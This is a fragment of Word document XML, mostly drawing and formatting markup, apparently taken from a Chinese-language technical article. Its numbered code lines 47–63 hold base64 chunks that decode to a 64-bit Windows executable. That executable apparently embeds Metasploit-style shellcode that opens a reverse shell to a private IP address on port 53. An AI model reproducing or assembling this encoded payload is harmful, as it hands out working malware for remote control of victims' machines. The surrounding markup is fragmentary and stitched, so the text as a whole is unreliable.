,14197,2800,14201,2800,14205,2800,14209,2800,14214,2800,14218,2800,14222,2800,14227,2800,14232,2800,14237,2800,14241,2800,14246,2800,14251,2800,14257,2800,14262,2800,14267,2800,14273,2800,14278,2800,14284,2800,14290,2800,14295,2800,14301,2800,14307,2800,14314,2800,14320,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2798,14326,2798,14326,2798,14326,2798,14326,2798,14326,2797,14326,2797,14326,2797,14326,2797,14326,2796,14326,2796,14326,2795,14326,2795,14326,2795,14326,2794,14326,2794,14326,2793,14326,2793,14326,2793,14326,2792,14326,2792,14326,2791,14326,2790,14326,2790,14326,2789,14326,2789,14326,2788,14326,2787,14326,2787,14326,2786,14326,2785,14326,2784,14326,2783,14326,2783,14326,2782,14326,2781,14326,2780,14326,2779,14326,2778,14326,2777,14326,2776,14326,2775,14326,2774,14326,2773,14326,2772,14326,2770,14326,2769,14326,2768,14326,2767,14326,2765,14326,2764,14326,2763,14326,2761,14326,2760,14326,2758,14326,2757,14326,2755,14326,2753,14326,2752,14326,2750,14326,2748,14326,2747,14326,2745,14326,2743,14326,2741,14326,2739,14326,2737,14326,2735,14326,2733,14326,2731,14326,2729,14326,2727,14326,2725,14326,2723,14326,2720,14326,2718,14326,2716,14326,2713,14326,2711,14326,2708,14326,2706,14326,2703,14326,2700,14326,2698,14326,2695,14326,2692,14326,2689,14326,2686,14326,2683,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14324,2680,14324,2680,14324,2680,14324,2680,14323,2680,14323,2680,14323,2680,14322,2680,14322,2680,14321,2680,14321,2680,14320,2680,14320,2680,14319,2680,14319,2680,14318,2680,14317,2680,14317,2680,14316,2680,14315,2680,14314,2680,14313,2680,14312,2680,14311,2680,14310,2680,14309,2680,14308,2680,14307,2680,14306,2680,14305,2680,14304,2680,14302,2680,14301,2680,14300,2680,14298,2680,14297,2680,14295,2680,14294,2680,14292,2680,14290,2680,14288,2680,14287,2680,14285,2680,14283,2680,14281,2680,14279,2680,14276,2680,14274,2680,14272,2680,14270,2680,14267,2680,14265,2680,14262,2680,14260,2680,14257,2680,14254,2680,14252,2680,14249,2680,14246,2680,14243,2680,14240,2680,14236,2680,14233,2680,14230,2680,14227,2680,14223,2680,14219,2680,14216,2680,14212,2680,14208,2680,14204,2680,14200,2680,14196,2680,14192,2680,14188,2680,14184,2680,14179,2680,14175,2680,14170,2680,14166,2680,14161,2680,14156,2680,14151,2680,14146,2680,14141,2680,14136,2680,14130,2680,14125,2680,14119,2680,14114,2680,14108,2680,14102,2680,14096,2680,14090,2680,14084,2680,14077,2680,14071e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14690;width:130;height:270" coordorigin="2670,14690" coordsize="130,270" path="m2680,14716l2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2683,14716,2683,14716,2683,14716,2683,14716,2684,14716,2684,14716,2684,14716,2685,14716,2685,14716,2685,14716,2686,14716,2686,14716,2686,14716,2687,14716,2687,14716,2688,14716,2688,14716,2689,14716,2689,14716,2690,14716,2690,14716,2691,14716,2692,14716,2692,14716,2693,14716,2694,14716,2694,14716,2695,14716,2696,14716,2697,14716,2697,14716,2698,14716,2699,14716,2700,14716,2701,14716,2702,14716,2703,14716,2704,14716,2705,14716,2706,14716,2707,14716,2708,14716,2709,14716,2710,14716,2712,14716,2713,14716,2714,14716,2715,14716,2717,14716,2718,14716,2720,14716,2721,14716,2723,14716,2724,14716,2726,14716,2727,14716,2729,14716,2731,14716,2732,14716,2734,14716,2736,14716,2738,14716,2740,14716,2741,14716,2743,14716,2745,14716,2747,14716,2749,14716,2752,14716,2754,14716,2756,14716,2758,14716,2760,14716,2763,14716,2765,14716,2768,14716,2770,14716,2773,14716,2775,14716,2778,14716,2780,14716,2783,14716,2786,14716,2789,14716,2792,14716,2794,14716,2797,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14718,2800,14718,2800,14718,2800,14718,2800,14719,2800,14719,2800,14719,2800,14719,2800,14720,2800,14720,2800,14721,2800,14721,2800,14721,2800,14722,2800,14722,2800,14723,2800,14723,2800,14724,2800,14725,2800,14725,2800,14726,2800,14727,2800,14728,2800,14728,2800,14729,2800,14730,2800,14731,2800,14732,2800,14733,2800,14734,2800,14735,2800,14736,2800,14738,2800,14739,2800,14740,2800,14742,2800,14743,2800,14744,2800,14746,2800,14748,2800,14749,2800,14751,2800,14752,2800,14754,2800,14756,2800,14758,2800,14760,2800,14762,2800,14764,2800,14766,2800,14768,2800,14771,2800,14773,2800,14775,2800,14778,2800,14780,2800,14783,2800,14786,2800,14788,2800,14791,2800,14794,2800,14797,2800,14800,2800,14803,2800,14806,2800,14809,2800,14813,2800,14816,2800,14820,2800,14823,2800,14827,2800,14831,2800,14834,2800,14838,2800,14842,2800,14846,2800,14850,2800,14855,2800,14859,2800,14863,2800,14868,2800,14872,2800,14877,2800,14882,2800,14887,2800,14892,2800,14897,2800,14902,2800,14907,2800,14912,2800,14918,2800,14923,2800,14929,2800,14935,2800,14941,2800,14947,2800,14953,2800,14959,2800,14965,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2798,14972,2798,14972,2798,14972,2798,14972,2798,14972,2797,14972,2797,14972,2797,14972,2797,14972,2796,14972,2796,14972,2795,14972,2795,14972,2795,14972,2794,14972,2794,14972,2793,14972,2793,14972,2793,14972,2792,14972,2792,14972,2791,14972,2790,14972,2790,14972,2789,14972,2789,14972,2788,14972,2787,14972,2787,14972,2786,14972,2785,14972,2784,14972,2783,14972,2783,14972,2782,14972,2781,14972,2780,14972,2779,14972,2778,14972,2777,14972,2776,14972,2775,14972,2774,14972,2773,14972,2772,14972,2770,14972,2769,14972,2768,14972,2767,14972,2765,14972,2764,14972,2763,14972,2761,14972,2760,14972,2758,14972,2757,14972,2755,14972,2753,14972,2752,14972,2750,14972,2748,14972,2747,14972,2745,14972,2743,14972,2741,14972,2739,14972,2737,14972,2735,14972,2733,14972,2731,14972,2729,14972,2727,14972,2725,14972,2723,14972,2720,14972,2718,14972,2716,14972,2713,14972,2711,14972,2708,14972,2706,14972,2703,14972,2700,14972,2698,14972,2695,14972,2692,14972,2689,14972,2686,14972,2683,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14970,2680,14970,2680,14970,2680,14970,2680,14969,2680,14969,2680,14969,2680,14969,2680,14968,2680,14968,2680,14967,2680,14967,2680,14967,2680,14966,2680,14966,2680,14965,2680,14964,2680,14964,2680,14963,2680,14963,2680,14962,2680,14961,2680,14960,2680,14960,2680,14959,2680,14958,2680,14957,2680,14956,2680,14955,2680,14954,2680,14953,2680,14951,2680,14950,2680,14949,2680,14948,2680,14946,2680,14945,2680,14944,2680,14942,2680,14940,2680,14939,2680,14937,2680,14935,2680,14934,2680,14932,2680,14930,2680,14928,2680,14926,2680,14924,2680,14922,2680,14920,2680,14917,2680,14915,2680,14913,2680,14910,2680,14908,2680,14905,2680,14902,2680,14900,2680,14897,2680,14894,2680,14891,2680,14888,2680,14885,2680,14882,2680,14879,2680,14875,2680,14872,2680,14868,2680,14865,2680,14861,2680,14857,2680,14854,2680,14850,2680,14846,2680,14842,2680,14838,2680,14833,2680,14829,2680,14825,2680,14820,2680,14816,2680,14811,2680,14806,2680,14801,2680,14796,2680,14791,2680,14786,2680,14781,2680,14775,2680,14770,2680,14764,2680,14759,2680,14753,2680,14747,2680,14741,2680,14735,2680,14729,2680,14723,2680,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:766.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,15330" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:15330;width:130;height:270" coordorigin="2670,15330" coordsize="130,270" path="m2680,15347l2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2683,15347,2683,15347,2683,15347,2683,15347,2684,15347,2684,15347,2684,15347,2685,15347,2685,15347,2685,15347,2686,15347,2686,15347,2686,15347,2687,15347,2687,15347,2688,15347,2688,15347,2689,15347,2689,15347,2690,15347,2690,15347,2691,15347,2692,15347,2692,15347,2693,15347,2694,15347,2694,15347,2695,15347,2696,15347,2697,15347,2697,15347,2698,15347,2699,15347,2700,15347,2701,15347,2702,15347,2703,15347,2704,15347,2705,15347,2706,15347,2707,15347,2708,15347,2709,15347,2710,15347,2712,15347,2713,15347,2714,15347,2715,15347,2717,15347,2718,15347,2720,15347,2721,15347,2723,15347,2724,15347,2726,15347,2727,15347,2729,15347,2731,15347,2732,15347,2734,15347,2736,15347,2738,15347,2740,15347,2741,15347,2743,15347,2745,15347,2747,15347,2749,15347,2752,15347,2754,15347,2756,15347,2758,15347,2760,15347,2763,15347,2765,15347,2768,15347,2770,15347,2773,15347,2775,15347,2778,15347,2780,15347,2783,15347,2786,15347,2789,15347,2792,15347,2794,15347,2797,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15348,2800,15348,2800,15348,2800,15348,2800,15348,2800,15349,2800,15349,2800,15349,2800,15349,2800,15350,2800,15350,2800,15350,2800,15351,2800,15351,2800,15352,2800,15352,2800,15353,2800,15353,2800,15354,2800,15354,2800,15355,2800,15356,2800,15356,2800,15357,2800,15358,2800,15359,2800,15360,2800,15361,2800,15361,2800,15362,2800,15363,2800,15365,2800,15366,2800,15367,2800,15368,2800,15369,2800,15371,2800,15372,2800,15373,2800,15375,2800,15376,2800,15378,2800,15379,2800,15381,2800,15383,2800,15385,2800,15386,2800,15388,2800,15390,2800,15392,2800,15394,2800,15396,2800,15399,2800,15401,2800,15403,2800,15406,2800,15408,2800,15411,2800,15413,2800,15416,2800,15419,2800,15421,2800,15424,2800,15427,2800,15430,2800,15433,2800,15436,2800,15440,2800,15443,2800,15446,2800,15450,2800,15453,2800,15457,2800,15461,2800,15465,2800,15469,2800,15472,2800,15477,2800,15481,2800,15485,2800,15489,2800,15494,2800,15498,2800,15503,2800,15507,2800,15512,2800,15517,2800,15522,2800,15527,2800,15532,2800,15537,2800,15543,2800,15548,2800,15554,2800,15559,2800,15565,2800,15571,2800,15577,2800,15583,2800,15589,2800,15595,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2798,15602,2798,15602,2798,15602,2798,15602,2798,15602,2797,15602,2797,15602,2797,15602,2797,15602,2796,15602,2796,15602,2795,15602,2795,15602,2795,15602,2794,15602,2794,15602,2793,15602,2793,15602,2793,15602,2792,15602,2792,15602,2791,15602,2790,15602,2790,15602,2789,15602,2789,15602,2788,15602,2787,15602,2787,15602,2786,15602,2785,15602,2784,15602,2783,15602,2783,15602,2782,15602,2781,15602,2780,15602,2779,15602,2778,15602,2777,15602,2776,15602,2775,15602,2774,15602,2773,15602,2772,15602,2770,15602,2769,15602,2768,15602,2767,15602,2765,15602,2764,15602,2763,15602,2761,15602,2760,15602,2758,15602,2757,15602,2755,15602,2753,15602,2752,15602,2750,15602,2748,15602,2747,15602,2745,15602,2743,15602,2741,15602,2739,15602,2737,15602,2735,15602,2733,15602,2731,15602,2729,15602,2727,15602,2725,15602,2723,15602,2720,15602,2718,15602,2716,15602,2713,15602,2711,15602,2708,15602,2706,15602,2703,15602,2700,15602,2698,15602,2695,15602,2692,15602,2689,15602,2686,15602,2683,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15600,2680,15600,2680,15600,2680,15600,2680,15599,2680,15599,2680,15599,2680,15599,2680,15598,2680,15598,2680,15597,2680,15597,2680,15596,2680,15596,2680,15595,2680,15595,2680,15594,2680,15594,2680,15593,2680,15592,2680,15591,2680,15591,2680,15590,2680,15589,2680,15588,2680,15587,2680,15586,2680,15585,2680,15584,2680,15583,2680,15582,2680,15581,2680,15579,2680,15578,2680,15577,2680,15575,2680,15574,2680,15572,2680,15571,2680,15569,2680,15567,2680,15566,2680,15564,2680,15562,2680,15560,2680,15558,2680,15556,2680,15554,2680,15552,2680,15550,2680,15548,2680,15545,2680,15543,2680,15541,2680,15538,2680,15535,2680,15533,2680,15530,2680,15527,2680,15524,2680,15521,2680,15518,2680,15515,2680,15512,2680,15509,2680,15506,2680,15502,2680,15499,2680,15495,2680,15491,2680,15488,2680,15484,2680,15480,2680,15476,2680,15472,2680,15468,2680,15464,2680,15459,2680,15455,2680,15450,2680,15446,2680,15441,2680,15436,2680,15432,2680,15427,2680,15422,2680,15416,2680,15411,2680,15406,2680,15400,2680,15395,2680,15389,2680,15383,2680,15378,2680,15372,2680,15366,2680,15359,2680,15353,2680,15347e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>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86" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1339" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>47</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HByb2dy"</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48</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"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABkhgIAYaVEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAA"</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49</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"AAAA8AAiIAsCCwAADAAAAAQAAAAAAAAAAAAAACAAAAAAAIABAAAAACAAAAACAAAEAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAQA"</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50</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"AAAAAAAAAGAAAAACAAAAAAAAAwBAhQAAQAAAAAAAAEAAAAAAAAAAABAAAAAAAAAgAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAA"</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51</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"ABAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAA"</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52</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAA"</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53</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"AAAAACAAAEgAAAAAAAAAAAAAAC50ZXh0AAAATAoAAAAgAAAADAAAAAIAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAACAA"</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54</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"AGAucnNyYwAAAJgCAAAAQAAAAAQAAAAOAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAGAA"</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55</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"AAAAAAAAEgAAAAAAAAAAAAAAAAAAQAAAQkgAAAACAAUA7CIAAGAHAAABAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAA"</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56</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgIoB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAACgAA"</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57</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"KAIAAAYAACoAAAAAAAAA/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>EgPt0pK"</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58</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"TTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ABIhcB0"</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59</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"Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dF12FhE"</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60</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"i0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xLpS///"</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61</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"/11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAAA1wKgBBEFUSYnkTInxQbpMdyYH/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9VMiepo"</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62</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"AQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>EyJ4kiJ"</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63</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"+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lVIg8Qg"</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459" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
